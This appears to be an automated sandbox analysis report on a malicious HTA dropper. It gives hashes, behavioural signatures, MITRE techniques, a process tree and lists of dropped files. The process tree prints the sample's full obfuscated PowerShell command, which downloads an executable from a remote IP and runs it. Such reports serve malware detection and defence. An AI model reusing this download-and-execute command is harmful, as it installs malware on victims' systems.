7e041a3670abd581eb735dab3a66975fafd7e921bb0f94a36b98829248462f8b

Analysis

max time kernel
141s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2024 12:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wethinkaboutthegreatsolutionforgreat.hta
Size

129KB
MD5

7a368478a9772fc6e87e8eda7ec7f7b3
SHA1

237eff7ffb66ca9507fdbd5512506ef4cf81a22d
SHA256

7e041a3670abd581eb735dab3a66975fafd7e921bb0f94a36b98829248462f8b
SHA512

114aa191194efec173adc3ab137eab58454854efa5109da30364b54108a74ccf68b66c659a9609ece5933aa72ab5997f7b93e510e37a51ebed51d903cbc4fe17
SSDEEP

96:Eam73EjaILjaeRVfr+ZqTF1OF3ja3jalHjaj7T:Ea23EuauoVj+IGu3u1uPT

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	2912	POWERShELl.ExE

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2912	POWERShELl.ExE
2872	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
4988	taskhostws.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000023c8e-75.dat	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1368	4988	WerFault.exe	100

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostws.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWERShELl.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2912	POWERShELl.ExE
2912	POWERShELl.ExE
2872	powershell.exe
2872	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	POWERShELl.ExE
Token: SeDebugPrivilege	2872	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4988	taskhostws.exe
4988	taskhostws.exe
4988	taskhostws.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4988	taskhostws.exe
4988	taskhostws.exe
4988	taskhostws.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 2912	2724	mshta.exe	85
PID 2724 wrote to memory of 2912	2724	mshta.exe	85
PID 2724 wrote to memory of 2912	2724	mshta.exe	85
PID 2912 wrote to memory of 2872	2912	POWERShELl.ExE	89
PID 2912 wrote to memory of 2872	2912	POWERShELl.ExE	89
PID 2912 wrote to memory of 2872	2912	POWERShELl.ExE	89
PID 2912 wrote to memory of 3708	2912	POWERShELl.ExE	94
PID 2912 wrote to memory of 3708	2912	POWERShELl.ExE	94
PID 2912 wrote to memory of 3708	2912	POWERShELl.ExE	94
PID 3708 wrote to memory of 1804	3708	csc.exe	95
PID 3708 wrote to memory of 1804	3708	csc.exe	95
PID 3708 wrote to memory of 1804	3708	csc.exe	95
PID 2912 wrote to memory of 4988	2912	POWERShELl.ExE	100
PID 2912 wrote to memory of 4988	2912	POWERShELl.ExE	100
PID 2912 wrote to memory of 4988	2912	POWERShELl.ExE	100
PID 4988 wrote to memory of 5092	4988	taskhostws.exe	101
PID 4988 wrote to memory of 5092	4988	taskhostws.exe	101
PID 4988 wrote to memory of 5092	4988	taskhostws.exe	101

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wethinkaboutthegreatsolutionforgreat.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\SysWOW64\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE
  "C:\Windows\SYSTeM32\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE" "PoWErsHElL -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT ; Iex($(ieX('[sYStEm.tExT.eNcodiNg]'+[char]0X3A+[char]0X3A+'UtF8.GeTstriNG([SySteM.coNverT]'+[chAr]58+[Char]58+'FROmBaSe64STring('+[CHaR]34+'JEdDeWxIWDRPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJERUZJTkl0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhGeExZSG5NUUosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0b3csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3llUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeFJ6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImloRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR0N5bEhYNE91OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMzAyL3Rhc2tob3N0d3MuZXhlIiwiJGVOdjpBUFBEQVRBXHRhc2tob3N0d3MuZXhlIiwwLDApO1NUQVJ0LVNsZWVwKDMpO3NUYVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHRhc2tob3N0d3MuZXhlIg=='+[chaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\52uywoaq\52uywoaq.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE04E.tmp" "c:\Users\Admin\AppData\Local\Temp\52uywoaq\CSCF99272D38CE345E2B8541D3112964915.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1804
- - C:\Users\Admin\AppData\Roaming\taskhostws.exe
    "C:\Users\Admin\AppData\Roaming\taskhostws.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Roaming\taskhostws.exe"
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 752
      4⤵
      Program crash
      PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4988 -ip 4988
1⤵
PID:2952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWERShELl.ExE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f2c118d018f3305f93b8f194333c7fd6

SHA1
7065442fbc3d331304f1503ef5cedeadf87be989

SHA256
1b52ace4bff1e51a1b163cdc874c34cdbdb89c215fd78afc2be4ca36a0c3f388

SHA512
f82d96e7a95750d5e84c90871fda175b52678e2f55629958972f3e71945297d8abae481b539ba12f884741ee7864c529b62bd2c65273fb29729036fd2178804b

Download Submit
C:\Users\Admin\AppData\Local\Temp\52uywoaq\52uywoaq.dll

Filesize
3KB

MD5
55bec411ad4d4403c4779f4f8a573029

SHA1
98384dc2decac588d1b25a2883ec4d6e64aa53a9

SHA256
95b8f16936896e6ec02724ef3360773d35b5e092392474d788e53330fde21169

SHA512
5af98b41427520f1e6372f56027bbab7c7b12278b02f349c696ba34fa689d878efb5c419e176344bd1c0eb84244ee04a7ad4f14b18f8e52e642bdb0866b233ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE04E.tmp

Filesize
1KB

MD5
22bf3417f0911ea719b9d2c52d9de872

SHA1
4d3f0ee0fa9eb23dce5acd363c5bf5a2d0bdaeb1

SHA256
89df19ce62e66fb07382c6a9824dd0be3b7c4c3e15dd35349061cd144bc29741

SHA512
171495f1abe84927bdfa893d0eaea8e9434ab662b89c1a9774c385b31ff00ee0abf5eb070ebebb6f5878a1b662475e3c0a4d48e7b42a7743d70bdf6cfef9d541

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dqyn3jny.xsf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostws.exe

Filesize
938KB

MD5
b47e4f366b08fe509c2a8f9ee7251f51

SHA1
3338dd3e335d1e8e6ee0d4c0c607248d333c25c1

SHA256
03461c2a07431aed5ff68bbcf42d7ef82f32190b44ba140befd3f474614b5f3d

SHA512
277032b371ca4992657c172995186b4593197a91c784e84b1b5652478d462b84792e8b10480ecf0eb05e4ce4130575c59f0f14d197d4e0d77c70c0bd6989aaec

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\52uywoaq\52uywoaq.0.cs

Filesize
460B

MD5
7d449c3b022ff885a410d7d58f117516

SHA1
5a4642c0a7a8745d9aad5243fa3dbdfa42fcd01c

SHA256
d82eab2c4860d52330cd6aefa6051d4b53566de18f6665b1140d59d79fd436e5

SHA512
3683fb94132803f56fbb7188f51c097c59a4c2297cd66e88571836d4b040ae8b15cafee7f2ce747f1cc8326a8144b4e0c262bd954211adc9d65c70f9e8c645d3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\52uywoaq\52uywoaq.cmdline

Filesize
369B

MD5
92deaa0b6bba82f19ef8cbe37653e3d8

SHA1
0b90cc0094f45560cb43d5f754e030b6a345d8a0

SHA256
d7391ff58f41184944798570a3ce7b351d9a9c0413a2d6694ceb3176d5c3c387

SHA512
7c3aadbe19bb3b9851fbc1325f291a2b772805ec5c515b087df4f85a74906821814e6d7b29115ba2f128683bff8f34a3be5a18ea4958dfdc0eae5c98c85f709b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\52uywoaq\CSCF99272D38CE345E2B8541D3112964915.TMP

Filesize
652B

MD5
f64f6ef01df8e560f725d59a9f08c090

SHA1
6a40033e83027e2da80679c8548d81d0005df5d1

SHA256
58b640ad760149d177e7ef90e0727e35e0d4fe057e1122bf39d96bafac884832

SHA512
e66e88806f946797bd8149320be16d1f6e5c21094d4860a4385be4a62c64452b8c1988536e6a6847423cdf02ac509f3fc1309e35f82ae18cbb406ae1ddd025d8

Download Submit
memory/2872-44-0x0000000007140000-0x000000000714A000-memory.dmp

Filesize
40KB

Download
memory/2872-50-0x0000000007350000-0x0000000007358000-memory.dmp

Filesize
32KB

Download
memory/2872-49-0x0000000007420000-0x000000000743A000-memory.dmp

Filesize
104KB

Download
memory/2872-29-0x0000000006D30000-0x0000000006D62000-memory.dmp

Filesize
200KB

Download
memory/2872-30-0x000000006D310000-0x000000006D35C000-memory.dmp

Filesize
304KB

Download
memory/2872-40-0x0000000006D70000-0x0000000006D8E000-memory.dmp

Filesize
120KB

Download
memory/2872-41-0x0000000007040000-0x00000000070E3000-memory.dmp

Filesize
652KB

Download
memory/2872-42-0x0000000007770000-0x0000000007DEA000-memory.dmp

Filesize
6.5MB

Download
memory/2872-43-0x0000000006E10000-0x0000000006E2A000-memory.dmp

Filesize
104KB

Download
memory/2872-48-0x0000000007310000-0x0000000007324000-memory.dmp

Filesize
80KB

Download
memory/2872-45-0x0000000007360000-0x00000000073F6000-memory.dmp

Filesize
600KB

Download
memory/2872-46-0x00000000072D0000-0x00000000072E1000-memory.dmp

Filesize
68KB

Download
memory/2872-47-0x0000000007300000-0x000000000730E000-memory.dmp

Filesize
56KB

Download
memory/2912-65-0x0000000006350000-0x0000000006358000-memory.dmp

Filesize
32KB

Download
memory/2912-6-0x0000000005670000-0x00000000056D6000-memory.dmp

Filesize
408KB

Download
memory/2912-0-0x0000000070A5E000-0x0000000070A5F000-memory.dmp

Filesize
4KB

Download
memory/2912-17-0x00000000058C0000-0x0000000005C14000-memory.dmp

Filesize
3.3MB

Download
memory/2912-71-0x0000000070A5E000-0x0000000070A5F000-memory.dmp

Filesize
4KB

Download
memory/2912-7-0x0000000005750000-0x00000000057B6000-memory.dmp

Filesize
408KB

Download
memory/2912-5-0x0000000004EF0000-0x0000000004F12000-memory.dmp

Filesize
136KB

Download
memory/2912-72-0x0000000070A50000-0x0000000071200000-memory.dmp

Filesize
7.7MB

Download
memory/2912-18-0x0000000005D90000-0x0000000005DAE000-memory.dmp

Filesize
120KB

Download
memory/2912-19-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

Filesize
304KB

Download
memory/2912-4-0x0000000070A50000-0x0000000071200000-memory.dmp

Filesize
7.7MB

Download
memory/2912-73-0x0000000007170000-0x0000000007192000-memory.dmp

Filesize
136KB

Download
memory/2912-74-0x0000000008200000-0x00000000087A4000-memory.dmp

Filesize
5.6MB

Download
memory/2912-3-0x0000000070A50000-0x0000000071200000-memory.dmp

Filesize
7.7MB

Download
memory/2912-2-0x0000000005040000-0x0000000005668000-memory.dmp

Filesize
6.2MB

Download
memory/2912-1-0x0000000002470000-0x00000000024A6000-memory.dmp

Filesize
216KB

Download
memory/2912-88-0x0000000070A50000-0x0000000071200000-memory.dmp

Filesize
7.7MB

Download